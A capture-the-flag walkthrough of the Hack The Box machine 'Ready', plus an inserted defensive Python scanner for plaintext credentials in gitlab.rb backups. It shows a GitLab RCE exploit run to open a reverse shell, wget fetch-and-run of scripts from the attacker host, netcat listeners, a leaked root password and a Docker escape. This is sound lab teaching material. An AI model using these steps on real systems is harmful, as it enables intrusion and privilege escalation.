Ready HackTheBox Walkthrough

Hello everyone, and welcome to yet another CTF challenge from Hack The Box, called ‘Ready’, which is available online for those who want to improve their skills in penetration testing and black-box testing. The challenge was designed by bertolis.

Level: Medium

Task: Find user.txt and root.txt in the victim’s machine

Penetration Methodologies

Scanning

  • Nmap

Enumeration

  • Browsing HTTP service
  • Enumerating Gitlab pages

Exploitation

  • Exploiting Gitlab 11.4.7 RCE
  • Spawning TTY Shell
  • Running linpeas to search for possible privilege escalation paths

Privilege Escalation

  • Escaping a privileged Docker container
  • Uploading bash script to gain root access

Capturing the flag

Walkthrough

Network Scanning

Let’s get started then!

To attack any machine, we need its IP address. Machines hosted on HackTheBox have a static IP address.

IP address assigned to the Ready machine: 10.129.149.69

Let us scan the VM with the most popular port scanning tool, nmap, to enumerate the open ports on the machine.

Code:
nmap -A 10.129.149.69

1.png


From the result above we found two open ports on the VM: SSH (22) and NGINX (5080).

Since we don’t have credentials for SSH, we cannot enumerate it further. The only service left is NGINX.

Enumeration

Starting with the NGINX service, we enumerate it by opening the target’s IP address and port in a web browser. We see a website running GitLab, which redirects us to its sign-in page.

2.png


Since there is a registration option, we went straight to the register page to see if we could create an account.

3.png


Once registered, we noticed that it says “update asap” in red. Usually, if a web application is running an old version, there is a high chance that the version has several known vulnerabilities.

4.png


Next, we searched searchsploit for an exploit for GitLab version 11.4.7 and found that a remote code execution (RCE) exploit is available. So we copied the RCE exploit to our local machine and checked its required parameters.

Code:
searchsploit gitlab 11.4.7
searchsploit -m 49334
cat 49334.py

5.png


Exploitation

Since it is a Python script, we ran it with the required parameters to obtain a reverse shell.

Code:
python3 49334.py -g http://10.129.149.69 -u ignite -p 12345678 -l 10.10.14.108 -P 1234

7.png


Next, we started a netcat listener on port 1234 in another terminal, which gave us a simple reverse shell for that user.

Code:
nc -lvp 1234
id

To upgrade to a proper interactive terminal, we run the following Python one-liner.

Code:
python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /tmp

To go further and get a root shell, we uploaded linpeas from our local machine to the victim machine; the script looks for possible paths to escalate privileges.

Code:
wget 10.10.14.108:8000/linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh

8.png


Privilege Escalation

The linpeas result below tells us that we are inside a Docker container, so we do some more enumeration.

9.png


During enumeration we found gitlab.rb inside the directory /opt/backup; the file contains SMTP login credentials. Such credentials are useful to us if they have been reused by other accounts, such as root. So we tried to log in as root with that password, and it worked.

But when we looked for root.txt, it was not in the root directory, because we are still inside a privileged Docker container, which has to be escaped to reach the root flag.

Code:
cd /opt
ls
cd /backup
ls
cat gitlab.rb | grep password
su root
Password : wW59U!ZKMbG9+*#h

10.png
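The root login above came from a plaintext SMTP password left in a backup copy of gitlab.rb. The following Python script is an added example, not part of the original walkthrough, showing the check a defender would run over such config backups: it parses omnibus-style section['key'] = "value" lines, skips the commented-out examples that make up most of a stock gitlab.rb, and reports only uncommented, non-empty credential-like values, masked for safe reporting. The sample config and all values in it are constructed.

```python
import re
from typing import List, Tuple

# Matches an omnibus GitLab setting line with a quoted literal value, e.g.
#   gitlab_rails['smtp_password'] = "secret"
SETTING_RE = re.compile(
    r"""^\s*(?P<section>\w+)\['(?P<key>[^']+)'\]\s*=\s*(?P<q>['"])(?P<value>.*?)(?P=q)\s*$"""
)

# Key fragments that indicate a credential (assumed list; extend as needed).
SENSITIVE_FRAGMENTS = ("password", "secret", "token", "private_key")


def find_plaintext_credentials(config_text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, full key, value) for every uncommented setting whose
    key looks credential-like and whose value is a non-empty quoted literal.
    Commented-out lines are ignored so stock example lines do not cause noise."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue
        m = SETTING_RE.match(line)
        if not m:
            continue
        key = m.group("key").lower()
        if not any(frag in key for frag in SENSITIVE_FRAGMENTS):
            continue
        if not m.group("value"):          # empty value, nothing leaked
            continue
        full_key = f"{m.group('section')}['{m.group('key')}']"
        findings.append((lineno, full_key, m.group("value")))
    return findings


def redact(findings: List[Tuple[int, str, str]]) -> List[Tuple[int, str, str]]:
    """Mask each value (keep two leading characters) so reports do not re-leak it."""
    return [(n, k, v[:2] + "*" * (len(v) - 2)) for n, k, v in findings]


# Constructed sample in the style of a gitlab.rb backup; every value is made up.
SAMPLE_GITLAB_RB = """\
# gitlab_rails['smtp_password'] = "example"   # commented example, must be ignored
gitlab_rails['smtp_enable'] = true
gitlab_rails['smtp_user_name'] = "mailer@example.test"
gitlab_rails['smtp_password'] = "Constructed-Pass-123"
gitlab_rails['db_password'] = ""
external_url 'http://gitlab.example.test'
"""

if __name__ == "__main__":
    for lineno, key, masked in redact(find_plaintext_credentials(SAMPLE_GITLAB_RB)):
        print(f"line {lineno}: {key} = {masked}")
```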


Escaping docker container

So, to escape the Docker container and get the root flag, we created a bash script on our local machine with the help of the article linked here.

11.png


Next, we started Python’s one-line SimpleHTTPServer on our local machine to transfer the file from our machine to the victim machine.

12.png


On the victim machine, we moved into the /tmp directory and used wget to download the bash script hosted on our local machine. We made it executable and then ran it.

Code:
cd /tmp
wget 10.10.14.108:8000/raj.sh
chmod 777 raj.sh
./raj.sh

14.png


Finally, we started a netcat listener on port 9000 in another terminal, which gave us a reverse shell as the root user.

Code:
nc -lvp 9000
cd /root
ls
cat root.txt

15.png


Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles, Ignite technologies. Contact here.